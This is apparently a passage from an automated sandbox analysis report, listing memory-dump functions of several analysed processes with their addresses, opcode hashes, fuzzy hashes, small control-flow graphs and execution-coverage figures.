                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f4f000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8a372844cfa4790a95332c13ea3322cc752074594e40047ccda7319b98673a69
                                                                                        • Instruction ID: eca60dd34b6f43c393c852e4475dcb80e4d403d49688f3409a4b97e0e41c0609
                                                                                        • Opcode Fuzzy Hash: 8a372844cfa4790a95332c13ea3322cc752074594e40047ccda7319b98673a69
                                                                                        • Instruction Fuzzy Hash: D611E270D0961A8FEB6CEF208852AEDB7E0FF85345F1002FEC809A72D2DF3159458A84
                                                                                        Function 00007FF848F407F0 Relevance: .1, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0c3657b245c02c5410db614e39cc6910994c7209d8aa77ee5012feb69962eed4
                                                                                        • Instruction ID: f46e92c96b1e1ca730fed4a397c5d7781610d10ffe7ad01c9de8f17b7df57b3f
                                                                                        • Opcode Fuzzy Hash: 0c3657b245c02c5410db614e39cc6910994c7209d8aa77ee5012feb69962eed4
                                                                                        • Instruction Fuzzy Hash: 6111E132C0C7C55FE3857B244CA61A57FB0FF62A40F5C01FAC8989B1D3EB182819875A
                                                                                        Function 00007FF848F5079E Relevance: .0, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f4f000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 38279f11d1471c12d0a9085fdfae2857017bba7e00f7646ed52771b9a083eb0f
                                                                                        • Instruction ID: d9600162256a370058e6c6317488181f1ab7c898c579b082bec6b3dc5b105a87
                                                                                        • Opcode Fuzzy Hash: 38279f11d1471c12d0a9085fdfae2857017bba7e00f7646ed52771b9a083eb0f
                                                                                        • Instruction Fuzzy Hash: 9F11A771C0D61A8EEB69BF108452AE9B7A0EF85345F5006FECC09971D2DB3559498A84
                                                                                        Function 00007FF848F560F8 Relevance: .0, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F56000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f56000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d638b5b07e9f8732ea8e28ba1220b992d44a058d776134045bc4eb800cb9248a
                                                                                        • Instruction ID: f696a26ce5d3a5ca9c110423014965f2d295a47edb802e94d2aa4ae1a45d71e1
                                                                                        • Opcode Fuzzy Hash: d638b5b07e9f8732ea8e28ba1220b992d44a058d776134045bc4eb800cb9248a
                                                                                        • Instruction Fuzzy Hash: 8DF0BD31608E488FCBD4EB6CD498E54B7E1FF6931130605D6D459CB276D665EC85CB40
                                                                                        Function 00007FF848F4F043 Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f4f000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 07b0398fc1984d19331296a26ded2167d87f1b89327ed02f5f839f737e6d5d8c
                                                                                        • Instruction ID: 329f56130a9f7d49f8f2f9ba211c7aea21260f057f940f24d1afdae055cb35f4
                                                                                        • Opcode Fuzzy Hash: 07b0398fc1984d19331296a26ded2167d87f1b89327ed02f5f839f737e6d5d8c
                                                                                        • Instruction Fuzzy Hash: 23F09632B0DD498FE798FB2C945466477D1FBA8751B1046FBC00EC72ABDE289C058740
                                                                                        Function 00007FF848F572E9 Relevance: .0, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F56000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f56000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1b098769a14d56aeb84198b56cda925cf9907251d8f37de38bcb4214fd6012d4
                                                                                        • Instruction ID: df952665dd3dab75fc3192929f693fb1c302687020f5050347095e2fb83c5d66
                                                                                        • Opcode Fuzzy Hash: 1b098769a14d56aeb84198b56cda925cf9907251d8f37de38bcb4214fd6012d4
                                                                                        • Instruction Fuzzy Hash: 80018F31A1DA888FD396F73884192647BA1FF55604B5500EBD049C76E3DA25AC05C345
                                                                                        Function 00007FF848F57725 Relevance: .0, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F56000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f56000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9b9f24b34b31578f93eb2dacef1858fe153163f8c84630cac41289701bc7c7b8
                                                                                        • Instruction ID: d1cf0134d7b62aa3f271c36e8af0ea1a527af1888b4b13fc696e33d230fcc013
                                                                                        • Opcode Fuzzy Hash: 9b9f24b34b31578f93eb2dacef1858fe153163f8c84630cac41289701bc7c7b8
                                                                                        • Instruction Fuzzy Hash: C8F0F63190DA844FE3A6F7389454560BFE1EF16614B0901FEC089D75F3DA69AC82C344
                                                                                        Function 00007FF848F4F018 Relevance: .0, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f4f000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cd051ca37c36be275ed866734af25a14dc72d9671fd92de6e4bdc365b5278e8e
                                                                                        • Instruction ID: 77daff97606fe0e59a6351a70c5d54f88693004aeba99765dfc55f2eed7c37dd
                                                                                        • Opcode Fuzzy Hash: cd051ca37c36be275ed866734af25a14dc72d9671fd92de6e4bdc365b5278e8e
                                                                                        • Instruction Fuzzy Hash: D3F0E073F0D9954FE79AEA2C14501742BD1EBA9B94B0405FBC80DE71D7C6147C058355
                                                                                        Function 00007FF848F49B08 Relevance: .0, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 84511764a146a16ee5b45b26cc11f37cf164263d69b0082aea3b3d1cb6c6b87a
                                                                                        • Instruction ID: 7bfdcff70b3a9ad0b5731b23c6b561ba9087a332d10a4a8584f65862a1cee515
                                                                                        • Opcode Fuzzy Hash: 84511764a146a16ee5b45b26cc11f37cf164263d69b0082aea3b3d1cb6c6b87a
                                                                                        • Instruction Fuzzy Hash: C1E09A32B0EA458FE3D9F63C60552A976A2EBA8651B1001BFC44EC72E3CE2858098704

                                                                                        Executed Functions

                                                                                        Function 00BE0978 Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000011.00000002.2182650994.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_17_2_be0000_upx.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b771da30cd177cf19753196f5b811db8b10264e456132ebb08e25343b9be1d31
                                                                                        • Instruction ID: 1e05db9b6746a710ca36d4a10fb798eba50f50146d276ba578110b75703c7910
                                                                                        • Opcode Fuzzy Hash: b771da30cd177cf19753196f5b811db8b10264e456132ebb08e25343b9be1d31
                                                                                        • Instruction Fuzzy Hash: 5C212974D1524ADBDB00EFAAC5846AEFBF2FB49301F20E5A5C405B3252D7B49A80CB90
                                                                                        Function 00BE08C1 Relevance: .0, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000011.00000002.2182650994.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_17_2_be0000_upx.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9fad47c74b4a4af948c0e8d5cce75add091047d437f065b406f461b6256f70c4
                                                                                        • Instruction ID: 1b836bb4acac7ed7b15417d0ec7b6ccb85b906f313c879612d1b967f8d4ab313
                                                                                        • Opcode Fuzzy Hash: 9fad47c74b4a4af948c0e8d5cce75add091047d437f065b406f461b6256f70c4
                                                                                        • Instruction Fuzzy Hash: 7F113970E0120A9FCB09EFB9C8906AEBBB1FF45304F1085B9C418A7351DB719A41CF96
                                                                                        Function 00BE08D0 Relevance: .0, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000011.00000002.2182650994.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_17_2_be0000_upx.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b5a3ac34ca8e0df2164db77e44282fb787a99e9b28a4a36d5c1d31349fad8a28
                                                                                        • Instruction ID: facfaf39d9c622ffb58e5349b5c509b0390e51f4626b490b2d2b1162e8b78a5d
                                                                                        • Opcode Fuzzy Hash: b5a3ac34ca8e0df2164db77e44282fb787a99e9b28a4a36d5c1d31349fad8a28
                                                                                        • Instruction Fuzzy Hash: 06014C70D4120A9FCB48EFB9C8506AEBBB5FF45300F1089ADC418A7350DB759A41CF92

                                                                                        Execution Graph

                                                                                        Execution Coverage:8.1%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:6
                                                                                        Total number of Limit Nodes:1
                                                                                        execution_graph 7124 18dbc28 7125 18dbc4f 7124->7125 7126 18dbd2c 7125->7126 7128 18d5348 7125->7128 7129 18dccb8 CreateActCtxA 7128->7129 7131 18dcd7b 7129->7131

                                                                                        Executed Functions

                                                                                        Function 018D5348 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 338 18d5348-18dcd79 CreateActCtxA 341 18dcd7b-18dcd81 338->341 342 18dcd82-18dcddc 338->342 341->342 349 18dcdde-18dcde1 342->349 350 18dcdeb-18dcdef 342->350 349->350 351 18dcdf1-18dcdfd 350->351 352 18dce00 350->352 351->352
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 018DCD69
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.4530956806.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_18d0000_ydztkyrb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: e96cc72ff8eb76a4d0809f50d4dff6c611abaf1bec9b67f62c994571ccfe92ae
                                                                                        • Instruction ID: f97c6712f6d1d47b7a1a53818ce784138dd3d4922e7372d406a3de1f82623363
                                                                                        • Opcode Fuzzy Hash: e96cc72ff8eb76a4d0809f50d4dff6c611abaf1bec9b67f62c994571ccfe92ae
                                                                                        • Instruction Fuzzy Hash: 6A41E0B0C0071DCBDB24DFA9C884BDDBBB5BF49304F20806AD408AB255DB756A46CF90
                                                                                        Function 016ED01C Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 508 16ed01c-16ed02e 509 16ed0bd-16ed0c4 508->509 510 16ed034 508->510 511 16ed036-16ed042 509->511 510->511 513 16ed048-16ed06a 511->513 514 16ed0c9-16ed0ce 511->514 515 16ed06c-16ed086 513->515 516 16ed0d3-16ed0e8 513->516 514->513 519 16ed08e-16ed09d 515->519 520 16ed09f-16ed0a7 516->520 519->520 521 16ed0f5 519->521 522 16ed0ea-16ed0f3 520->522 523 16ed0a9-16ed0ba 520->523 522->523
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.4528375211.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_16ed000_ydztkyrb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0c58429036184c2c0d553804bbfcb297ba393a9df75e43aafb05429b0d172b18
                                                                                        • Instruction ID: baec0ac78807567463fb17581885b4f094e7007522d02180eccc0c11996b08e7
                                                                                        • Opcode Fuzzy Hash: 0c58429036184c2c0d553804bbfcb297ba393a9df75e43aafb05429b0d172b18
                                                                                        • Instruction Fuzzy Hash: B8212271604200DFCB15DF68D988B26BFA5FB88314F28C66DD90A0B396C33AD407CA61
                                                                                        Function 016ED1D4 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 525 16ed1d4-16ed1e6 526 16ed1ec 525->526 527 16ed275-16ed27c 525->527 528 16ed1ee-16ed1fa 526->528 527->528 530 16ed200-16ed222 528->530 531 16ed281-16ed286 528->531 532 16ed28b-16ed2a0 530->532 533 16ed224-16ed23e 530->533 531->530 538 16ed257-16ed25f 532->538 535 16ed246-16ed255 533->535 537 16ed2ad 535->537 535->538 539 16ed2a2-16ed2ab 538->539 540 16ed261-16ed272 538->540 539->540
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.4528375211.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_16ed000_ydztkyrb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 731211b2d7762d77058ee1af9c61a40ad8e21f52e059623c541a1df6190c3adf
                                                                                        • Instruction ID: 4e5e38abbeaa1c35dc7884916a08453bad7a147d4b736d8a83f7b25a983349e5
                                                                                        • Opcode Fuzzy Hash: 731211b2d7762d77058ee1af9c61a40ad8e21f52e059623c541a1df6190c3adf
                                                                                        • Instruction Fuzzy Hash: 9A210775504204EFDB05DFA8D9C8F26BBA5FB84324F20C66DDA094B396C33AD406CA61
                                                                                        Function 016ED006 Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 556 16ed006-16ed02e 557 16ed0bd-16ed0c4 556->557 558 16ed034 556->558 559 16ed036-16ed042 557->559 558->559 561 16ed048-16ed06a 559->561 562 16ed0c9-16ed0ce 559->562 563 16ed06c-16ed086 561->563 564 16ed0d3-16ed0e8 561->564 562->561 567 16ed08e-16ed09d 563->567 568 16ed09f-16ed0a7 564->568 567->568 569 16ed0f5 567->569 570 16ed0ea-16ed0f3 568->570 571 16ed0a9-16ed0ba 568->571 570->571
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.4528375211.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_16ed000_ydztkyrb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 992b5958bc239f09d54e47cdca54227c79de02bf62db2a5c81404aae68934e4b
                                                                                        • Instruction ID: d6709c463d540f79b715ef2c6b5983f9ca88f28247502d9574c8c3488496de36
                                                                                        • Opcode Fuzzy Hash: 992b5958bc239f09d54e47cdca54227c79de02bf62db2a5c81404aae68934e4b
                                                                                        • Instruction Fuzzy Hash: 082192755093808FDB03CF24D994715BFB1FB46214F28C6DAD8498F2A7C33A980ACB62
                                                                                        Function 016ED1CF Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.4528375211.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_16ed000_ydztkyrb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                        • Instruction ID: 496725e22f3911fb8fb061ea0264cf18f91ca23af8d56956f8e550f4106504b3
                                                                                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                        • Instruction Fuzzy Hash: 2B11BB75504280DFDB02CF54C9C8B15BFA1FB84224F24C6A9D9494B396C33AD40ACB62

                                                                                        Execution Graph

                                                                                        Execution Coverage:8.2%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:6
                                                                                        Total number of Limit Nodes:1
                                                                                        execution_graph 7209 15dbc28 7211 15dbc4f 7209->7211 7210 15dbd2c 7211->7210 7213 15d5348 7211->7213 7214 15dccb8 CreateActCtxA 7213->7214 7216 15dcd7b 7214->7216

                                                                                        Executed Functions

                                                                                        Function 015D5348 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 338 15d5348-15dcd79 CreateActCtxA 341 15dcd7b-15dcd81 338->341 342 15dcd82-15dcddc 338->342 341->342 349 15dcdde-15dcde1 342->349 350 15dcdeb-15dcdef 342->350 349->350 351 15dcdf1-15dcdfd 350->351 352 15dce00 350->352 351->352
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 015DCD69
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001A.00000002.4528967240.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_26_2_15d0000_swtpd1aw.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 5295b4c33fd17ebd6c5eddd0468af65062eb45dca75d1003b47147be1f5728a0
                                                                                        • Instruction ID: 4d2e7a74f09b17a95e6f0ba6a7d089feba41818ec70caeba9ffb888727578326
                                                                                        • Opcode Fuzzy Hash: 5295b4c33fd17ebd6c5eddd0468af65062eb45dca75d1003b47147be1f5728a0
                                                                                        • Instruction Fuzzy Hash: 2041DFB0C00719CBDB28DFA9C884B9DBBF5BF48304F20806AD418AB255DB75694ACF90
                                                                                        Function 0152D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 508 152d3d8-152d3ea 509 152d3f0 508->509 510 152d47e-152d485 508->510 511 152d3f2-152d3fe 509->511 510->511 513 152d404-152d426 511->513 514 152d48a-152d48f 511->514 515 152d494-152d4a9 513->515 516 152d428-152d446 513->516 514->513 520 152d460-152d468 515->520 519 152d44e-152d45e 516->519 519->520 521 152d4b6 519->521 522 152d46a-152d47b 520->522 523 152d4ab-152d4b4 520->523 523->522
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001A.00000002.4524994345.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_26_2_152d000_swtpd1aw.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dc8e5d91432a92ddb8cff695020c8284bc2d0f865c8e9936291f9c3ae985ad7e
                                                                                        • Instruction ID: 428e9ed7b0ef481bb17fef9c0e03a04e39c60e9ead2a1c443351452fc4c192f7
                                                                                        • Opcode Fuzzy Hash: dc8e5d91432a92ddb8cff695020c8284bc2d0f865c8e9936291f9c3ae985ad7e
                                                                                        • Instruction Fuzzy Hash: 08213672504204DFDB05DF58C9C0B5ABFB5FB99314F20C569D9090F296C37AE446C6E1
                                                                                        Function 0153D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 542 153d1d4-153d1e6 543 153d275-153d27c 542->543 544 153d1ec 542->544 545 153d1ee-153d1fa 543->545 544->545 546 153d281-153d286 545->546 547 153d200-153d222 545->547 546->547 549 153d224-153d23e 547->549 550 153d28b-153d2a0 547->550 553 153d246-153d255 549->553 554 153d257-153d25f 550->554 553->554 555 153d2ad 553->555 556 153d2a2-153d2ab 554->556 557 153d261-153d272 554->557 556->557
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001A.00000002.4526182385.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_26_2_153d000_swtpd1aw.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c2f5dbef3c43b8aa92a5980111b5b56a90f56fd67c558c3aaaef989ce1a0b4b4
                                                                                        • Instruction ID: 94df659563801318839bb5bf8c96287f0e4fb5e1f0d1960bd42082c10579372d
                                                                                        • Opcode Fuzzy Hash: c2f5dbef3c43b8aa92a5980111b5b56a90f56fd67c558c3aaaef989ce1a0b4b4
                                                                                        • Instruction Fuzzy Hash: CC21F271504204EFDB06DFA8D9C0B2ABBB5FBC8324F60C96DE9494F256C33AD406CA61
                                                                                        Function 0153D01C Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 525 153d01c-153d02e 526 153d034 525->526 527 153d0bd-153d0c4 525->527 528 153d036-153d042 526->528 527->528 530 153d0c9-153d0ce 528->530 531 153d048-153d06a 528->531 530->531 532 153d0d3-153d0e8 531->532 533 153d06c-153d086 531->533 538 153d09f-153d0a7 532->538 535 153d08e-153d09d 533->535 537 153d0f5 535->537 535->538 539 153d0ea-153d0f3 538->539 540 153d0a9-153d0ba 538->540 539->540
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001A.00000002.4526182385.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_26_2_153d000_swtpd1aw.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f2a265e59fb05f4b12a709a32291862a1118e08eec3f999cd7aab0206a3a5237
                                                                                        • Instruction ID: 7635cf3b5118c91559224ecb280bfbd677ab3b78b740271973ae6d67896d620f
                                                                                        • Opcode Fuzzy Hash: f2a265e59fb05f4b12a709a32291862a1118e08eec3f999cd7aab0206a3a5237
                                                                                        • Instruction Fuzzy Hash: 37210071604204DFCB15DFA8D980B2AFFB5FB88714F60C969E94A0F256D33AD406CA61
                                                                                        Function 0153D006 Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001A.00000002.4526182385.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_26_2_153d000_swtpd1aw.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f874acbf02dcc511d4d6d36694581e1e7506d38f8669a14ec1725fed41c38329
                                                                                        • Instruction ID: 0633a47a7159a3771264daeed2c06ab71daebae0dab7d6a27bc80b1b8300c66a
                                                                                        • Opcode Fuzzy Hash: f874acbf02dcc511d4d6d36694581e1e7506d38f8669a14ec1725fed41c38329
                                                                                        • Instruction Fuzzy Hash: B3217F755093808FDB03CF64D994715BF71FB86214F28C5DAD8498F2A7C33A980ACB62
                                                                                        Function 0152D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001A.00000002.4524994345.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_26_2_152d000_swtpd1aw.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction ID: 538a559834a934c5bb17b323b53a39b72e00cc3493ca1f1d13152e584d72ad9d
                                                                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction Fuzzy Hash: 0511CD72404280CFDB02CF44D9C4B5ABF71FB85224F24C6A9D9090E256C33AE45ACBA2
                                                                                        Function 0153D1CF Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001A.00000002.4526182385.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_26_2_153d000_swtpd1aw.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                        • Instruction ID: 44dca1d6b3ed70a521bce5745140b764bea3e4bf27a732cda7f6a358d8780e81
                                                                                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                        • Instruction Fuzzy Hash: 9E11BB75504280DFDB02CF54C5C4B19BFB1FB84224F24C6A9E8494F296C33AD40ACB62

                                                                                        Execution Graph

                                                                                        Execution Coverage:18.5%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:33
                                                                                        Total number of Limit Nodes:0
